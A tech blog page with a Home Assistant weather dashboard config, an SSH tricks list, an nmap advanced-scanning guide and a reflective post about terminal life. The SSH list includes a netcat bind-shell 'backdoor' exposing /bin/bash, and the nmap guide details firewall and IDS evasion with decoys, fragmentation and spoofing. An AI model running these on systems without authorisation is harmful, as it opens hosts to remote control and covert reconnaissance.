UrFix's Blog

A geek without a cause

Category: Tricks

  • type: sidebar
    path: test
    title: weather
    cards:
      - type: iframe
        url: >-
          https://embed.windy.com/embed.html?type=map&location=coordinates&metricRain=default&metricTemp=default&metricWind=default&zoom=3&overlay=wind&product=ecmwf&level=surface&lat=42.553&lon=-91.758
        aspect_ratio: 50%
      - type: clock
        view_layout:
          position: sidebar
      - type: vertical-stack
        cards:
          - type: custom:mushroom-template-card
            entity: sensor.nws_alerts_alerts
            primary: 🌩️ National Weather Service Alerts
            icon: mdi:alert
            icon_color: amber
            multiline_secondary: false
            tap_action:
              action: more-info
            secondary: |-
              {% if (states('sensor.nws_alerts_alerts') | int) > 0 %}
                {{ states('sensor.nws_alerts_alerts') }} active alert{{ 's' if (states('sensor.nws_alerts_alerts') | int) > 1 else '' }}
              {% else %}
                No active alerts
              {% endif %}
            badge_color: ""
            fill_container: false
          - type: conditional
            conditions:
              - condition: numeric_state
                entity: sensor.nws_alerts_alerts
                above: 0
            card:
              type: markdown
              content: >
                {% set alerts = state_attr('sensor.nws_alerts_alerts', 'Alerts') %}
                {% if alerts %}
                  {% for alert in alerts %}
                ⚠️ **{{ alert.Event }}**
    
                📰  {{ alert.Headline }}
    
                🕒 Issued:   {{ as_local(strptime(alert.Sent,
                '%Y-%m-%dT%H:%M:%S%z')).strftime('%B %-d, %Y at %-I:%M %p') }}
    
                ⏰ Expires:   {{ as_local(strptime(alert.Expires,
                '%Y-%m-%dT%H:%M:%S%z')).strftime('%B %-d, %Y at %-I:%M %p') }} {% if
                alert.Severity != 'Unknown' %}
    
                📊 Severity: {{ alert.Severity }} {% endif %}
    
                {% if alert.Certainty != 'Unknown' %} 📡 Certainty: {{
                alert.Certainty }} {% endif %}
    
                <details> <summary>📝 <strong>Description</strong></summary>
                  {% set desc = alert.Description.replace('\n', ' ') %}
                  {% set parts = desc.split('* ') %}
                  {% for part in parts if part %}
                  <strong>{{ part.split('...')[0] | trim }}:</strong> {{ part.split('...', 1)[1] | trim }}
                  {% endfor %}
                </details>
    
                <details>
                  <summary>📢 <strong>Instructions</strong></summary>
                  {% set instruction = alert.Instruction.replace('\n', ' ') %}
                  {{ instruction | trim }}
                </details>
    
                  {% endfor %}
                {% else %} No active alerts. {% endif %}
        grid_options:
          columns: 12
          rows: auto
        view_layout:
          position: sidebar
      - type: custom:windrose-card
        title: Wind direction
        data_period:
          hours_to_show: 4
        refresh_interval: 300
        windspeed_bar_location: bottom
        wind_direction_entity:
          entity: sensor.wind_direction
          use_statistics: true
          direction_compensation: 0
        windspeed_entities:
          - entity: sensor.wind_speed
            name: speed
            speed_unit: auto
            use_statistics: true
            windspeed_bar_full: true
            output_speed_unit: mps
            speed_range_beaufort: true
        direction_labels:
          cardinal_direction_letters: NESW
        windrose_draw_north_offset: 0
        current_direction:
          show_arrow: true
          arrow_size: 50
          center_circle_size: 30
        compass_direction:
          auto_rotate: true
          entity: sensor.wind_direction
        cardinal_direction_letters: N,E,S,W
        matching_strategy: direction-first
        center_calm_percentage: true
        view_layout:
          position: sidebar
      - square: true
        type: grid
        cards:
          - graph: line
            type: sensor
            entity: sensor.esphome_web_9e83dc_temperature
            detail: 2
            name: Inside
          - graph: line
            type: sensor
            entity: sensor.esphome_web_9e83dc_higrow1_humidity_2
            detail: 1
            name: Humid
          - graph: line
            type: sensor
            entity: sensor.esphome_web_9e83dc_bh1750_illuminance_2
            detail: 1
            name: Lux
          - graph: line
            type: sensor
            entity: sensor.wind_speed
            detail: 1
            name: Wind
          - graph: line
            type: sensor
            entity: sensor.home_dew_point
            detail: 1
            name: Dew
          - graph: line
            type: sensor
            entity: sensor.home_grass_pollen_day_0
            detail: 1
            name: Pollen
        view_layout:
          position: sidebar
      - square: true
        type: grid
        cards:
          - graph: line
            type: sensor
            entity: sensor.home_apparent_temperature
            detail: 1
            name: Outside
          - graph: line
            type: sensor
            entity: sensor.home_realfeel_temperature
            detail: 1
            name: Feels like
          - graph: line
            type: sensor
            entity: sensor.humidity_kikk
            detail: 1
            name: Humidity
          - graph: line
            type: sensor
            entity: sensor.home_uv_index_day_0
            detail: 1
          - graph: line
            type: sensor
            entity: sensor.home_thunderstorm_probability_day_0
            detail: 1
            name: Thunder
          - graph: line
            type: sensor
            entity: sensor.home_precipitation
            detail: 1
            name: Rain
        view_layout:
          position: main
        columns: 6
    icon: mdi:weather-cloudy-alert
    
  • SSH isn’t just a protocol—it’s a skeleton key for the connected world. As a sysadmin by day and terminal poet by night, I’ve always believed SSH is the unsung hero of infrastructure. Beyond ssh user@host lies a universe of tunneling, automation, and rescue operations that’ll transform your workflow from functional to frictionless. Let’s crack open the toolbox.


    🔐 I. Core SSH Wizardry

    1. Password-Less Logins & Key Orchestration

      ssh-copy-id user@host  # Copies public key

      Generate keys first with ssh-keygen. For systems without ssh-copy-id:

      cat ~/.ssh/id_rsa.pub | ssh user@host "mkdir -p ~/.ssh; cat >> ~/.ssh/authorized_keys"

      Why it matters: Eliminate password prompts + enable script automation. Essential for CI/CD pipelines.
    2. Persistent Connections (No More Handshake Delays)

      ssh -MNf user@host  # Master connection in background

      Add to ~/.ssh/config:

      Host host
      ControlPath ~/.ssh/master-%r@%h:%p
      ControlMaster auto

      Pro Tip: Slashes rsync transfer times by 70% by reusing sockets.
    3. Escape Aliases for Raw Commands

      \rm critical_file  # Bypasses "rm -i" alias

      The backslash ignores shell aliases—vital when scripts demand vanilla behavior.

    🌉 II. Tunnels & Proxies: Your Digital Escape Routes

    1. Local Port Forwarding (Access “Blocked” Services)

      ssh -N -L 3000:internal-server:80 jump-host

      Now http://localhost:3000 tunnels through jump-host to internal-server:80. Ideal for bypassing firewalls.
    2. Remote Port Forwarding (Expose Local Apps)

      ssh -R 8080:localhost:3000 public-server

      Access your local dev server (localhost:3000) via public-server:8080. Demo your work without deploying.
    3. SSHFS – Mount Remote Filesystems Locally

      sshfs user@host:/remote/path /local/mount

      Edit remote files in Vim/VS Code as if they’re local. Requires sshfs install (fuse.sourceforge.net).

    ⚡ III. Sysadmin Survival Kit

    1. Resume Failed File Transfers

      rsync --partial --progress --rsh=ssh largefile user@host:/backup/

      Lifesaver for 50GB database dumps over flaky VPNs.
    2. Run GUI Apps Remotely (Yes, Firefox Works!)

      ssh -X user@host firefox

      Ensure /etc/ssh/sshd_config has X11Forwarding yes. Use -Y for trusted X11.
    3. Disown Long-Running Tasks

      ^Z            # Suspend job
      bg # Send to background
      disown %1 # Detach from terminal

      Walk away without nohup. The process survives session death.

    🛠️ IV. Next-Level Ninjutsu

    1. Port Knocking (Stealth Firewall Control)

      knock host 3000 4000 5000 && ssh -p 22 user@host

      Sequence opens SSH port via knockd. Close with reverse sequence.
    2. Monitor Live Network Traffic Over SSH

      ssh root@server 'tshark -f "port !22" -w -' | wireshark -k -i -

      Capture packets remotely, analyze locally. Filter aggressively to save bandwidth.
    3. SSH + Screen = Unkillable Sessions

      ssh -t user@server screen -xRR

      Reattach to sessions after coffee spills or airport Wi-Fi drops. Ctrl-a d detaches.

    ⚠️ V. Danger Zone (Use Responsibly!)

    1. Remote Bash Backdoor

      nc -vv -l -p 1234 -e /bin/bash  # On target machine
      nc target-ip 1234 # Attacker's command

      Warning: Exposes shell publicly. Only use on trusted networks.
    2. Throttle Bandwidth for Fair Play

      tar cz /backup | cstream -t 500k | ssh host "tar xz -C /restore"

      Cap transfers at 500 KB/s to avoid choking the office VPN.
    3. Autossh – The Self-Healing Connection

      autossh -M 50000 -t host 'screen -raAd mysession'

      Restarts SSH if laptops hop between networks. -M sets monitor port.

    Tools don’t make the master—but they reveal one.

    SSH isn’t just about access; it’s about intent. Whether you’re tunneling through censorship, rescuing a frozen server, or automating deployments, these commands turn constraints into possibilities.

    💬 Your Turn: What’s your favorite SSH hack? Share the magic in the comments.

    For more terminal sorcery, subscribe to the UrFix newsletter. We dissect one command every Tuesday.


    About the Author:
    Isaias Irizarry is a network whisperer and recovering poet. When not debugging Kubernetes clusters, he writes haikus about TCP handshakes. His PS3 still runs Gentoo (see setup guide).

  • by

    The Cartographer’s Guide: Advanced Network Mapping with Nmap

    Like drawing maps of invisible cities, network discovery is both science and art—a way of understanding the digital landscapes that surround us.

    Introduction: Reading the Digital Horizon

    Nmap (Network Mapper) is more than a tool—it’s a lens through which we perceive the architecture of connection. Whether you’re securing your own infrastructure, conducting authorized penetration testing, or simply understanding how networks breathe and pulse with data, mastering nmap is like learning to read the stars.

    Important: This guide assumes you have explicit permission to scan the networks you’re exploring. Unauthorized network scanning may violate terms of service or local laws.

    The Foundation: Basic Syntax Revisited

    nmap [Scan Type] [Options] {target specification}

    But let’s move beyond the basics into the poetry of advanced scanning.

    Advanced Host Discovery

    The Whisper Scan: Minimal Footprint Discovery

    # TCP SYN discovery on specific ports
    nmap -PS22,80,443,8080 -sn 192.168.1.0/24
    
    # UDP discovery for services that live in the shadows
    nmap -PU53,123,161 -sn target_range
    
    # ICMP echo with timestamp and netmask requests
    nmap -PE -PP -PM -sn target_range

    The -sn flag tells nmap to skip port scanning after host discovery—sometimes you just want to know who’s listening before you start the conversation.

    Bypassing Firewalls: The Art of Misdirection

    # Fragment packets to slip past packet filters
    nmap -f -f -T2 target
    
    # Use decoys to mask your true location
    nmap -D RND:10 target
    
    # Source port spoofing for services that trust specific ports
    nmap --source-port 53 target

    Port Scanning Techniques: Different Ways of Knocking

    The TCP Connect Scan: Polite and Thorough

    nmap -sT -p 1-65535 target

    The SYN Stealth Scan: Half-Handshakes and Whispered Secrets

    nmap -sS -p- target

    The UDP Scan: Patience for the Connectionless

    # UDP scanning requires patience—responses are often silence
    nmap -sU -p 53,123,161,162,69,514 target
    
    # Combine with version detection for better results
    nmap -sU -sV --version-intensity 0 target

    The ACK Scan: Testing Firewall Rules

    # Helps distinguish between filtered and unfiltered ports
    nmap -sA target

    Advanced Timing and Performance

    Timing Templates: From Whisper to Shout

    # Paranoid: IDS evasion, extremely slow
    nmap -T0 target
    
    # Sneaky: IDS evasion, slow
    nmap -T1 target
    
    # Polite: Normal speed, less bandwidth
    nmap -T2 target
    
    # Normal: Default timing
    nmap -T3 target
    
    # Aggressive: Fast networks, time limit
    nmap -T4 target
    
    # Insane: Very fast networks, accuracy sacrificed
    nmap -T5 target

    Custom Timing: Fine-Tuning the Rhythm

    # Custom delays and timeouts
    nmap --min-rtt-timeout 100ms --max-rtt-timeout 500ms --initial-rtt-timeout 200ms target
    
    # Parallelization control
    nmap --min-parallelism 10 --max-parallelism 50 target

    Service and Version Detection: Digital Fingerprinting

    Basic Version Detection

    nmap -sV target

    Aggressive Version Detection

    # Maximum version detection intensity
    nmap -sV --version-intensity 9 target
    
    # Include version detection in comprehensive scan
    nmap -A target

    Script Engine: The Swiss Army Knife

    # Run default scripts
    nmap -sC target
    
    # Run specific script categories
    nmap --script vuln target
    nmap --script auth target
    nmap --script discovery target
    
    # Chain multiple categories
    nmap --script "vuln and safe" target
    
    # Custom script execution
    nmap --script http-enum,http-headers,http-methods target

    Operating System Detection: Digital DNA Analysis

    # OS fingerprinting
    nmap -O target
    
    # Aggressive OS detection with version scanning
    nmap -A target
    
    # OS detection with additional options
    nmap -O --osscan-limit --osscan-guess target

    Advanced Output and Reporting

    Multiple Output Formats

    # Generate reports in multiple formats
    nmap -oA comprehensive_scan target
    
    # XML output for parsing
    nmap -oX scan_results.xml target
    
    # Grepable output for command-line processing
    nmap -oG scan_results.gnmap target

    Real-time Output Control

    # Verbose output with debugging
    nmap -vv -d target
    
    # Packet trace for deep analysis
    nmap --packet-trace target

    Firewall and IDS Evasion: The Art of Invisibility

    Fragmentation and MTU Discovery

    # Fragment packets
    nmap -f target
    
    # Custom MTU (must be multiple of 8)
    nmap --mtu 16 target

    Timing Randomization

    # Random delays between probes
    nmap --scan-delay 1s --max-scan-delay 10s target
    
    # Randomize target order
    nmap --randomize-hosts target_list

    Advanced Spoofing

    # Spoof source IP (requires raw socket privileges)
    nmap -S spoofed_ip target
    
    # Interface specification for multi-homed systems
    nmap -e eth0 target

    Practical Advanced Examples

    Comprehensive Network Audit

    nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 \
         -PY -g 53 --script "default or (discovery and safe)" \
         -oA comprehensive_audit target_network/24

    Stealth Vulnerability Assessment

    nmap -sS -T2 -f --source-port 53 --data-length 32 \
         --script "vuln and safe" -oX vuln_scan.xml target

    Web Application Discovery

    nmap -p 80,443,8080,8443 -sV --script http-enum,http-headers,\
         http-methods,http-robots.txt,http-title target_range

    Performance Optimization for Large Networks

    # Fast scan for large networks
    nmap -T4 -F --top-ports 1000 --open target_network/16
    
    # Parallel scanning with GNU parallel
    echo "target1 target2 target3" | tr ' ' '\n' | \
    parallel -j 5 nmap -T4 -A -oX {}.xml {}

    Interpreting Results: Reading Between the Lines

    Understanding nmap output is crucial:

    • Open: Service is actively listening
    • Closed: Port is accessible but no service listening
    • Filtered: Packet filtered, possibly by firewall
    • Unfiltered: Accessible but unknown if open/closed
    • Open|Filtered: Cannot determine between open and filtered
    • Closed|Filtered: Cannot determine between closed and filtered

    Ethical Considerations: The Cartographer’s Code

    Remember that with great power comes great responsibility. Network mapping should always be:

    1. Authorized: Only scan networks you own or have explicit permission to test
    2. Documented: Keep records of your scanning activities
    3. Proportionate: Use the minimum level of intrusion necessary
    4. Professional: Follow responsible disclosure for any vulnerabilities found

    Conclusion: Maps of Digital Territory

    Mastering nmap is like learning to read the topology of cyberspace itself. Each scan is a conversation with the network, each response a word in a larger dialogue about security, connectivity, and the invisible infrastructure that binds our digital world together.

    The true art lies not just in running commands, but in understanding what the silence between responses tells you, what the timing of a reset packet reveals, and how the constellation of open ports maps to the intentions and vulnerabilities of the services within.

    Map wisely. Scan ethically. Understand deeply.


    Remember: This tutorial is for educational and authorized testing purposes only. Always ensure you have proper permission before scanning networks that don’t belong to you.

  • There’s something meditative about a blinking cursor.
    It doesn’t judge, doesn’t interrupt. It waits.
    For a command. For a decision. For a path forward.

    When my life was in pieces—physically, emotionally, spiritually—I found solace in a terminal window. Bash became my safe space. Every sudo felt like reclaiming control. Every successful script was a small win, a little light breaking through the static.

    I used to run top to monitor system processes, but it became a metaphor. What’s taking up my bandwidth? What do I need to kill off to free some RAM—some peace?

    top
    kill -9 toxic_pattern
    

    I still tinker with old machines, booting life into hardware most folks would scrap. Kind of like I did with myself. Rebuilt from the kernel up. Patched. Stable. Not perfect—but fully operational.

    So yeah—this blog’s still about commands and configs. But it’s also about the human side of hacking. The resilience built line by line. Command by command.

    And if you’re reading this, maybe you’re in the middle of your own install process. Just know: even when it seems like everything’s broken, recovery mode exists. And you’ve got root access to your story.

Chat

Hi 👋, how can we help?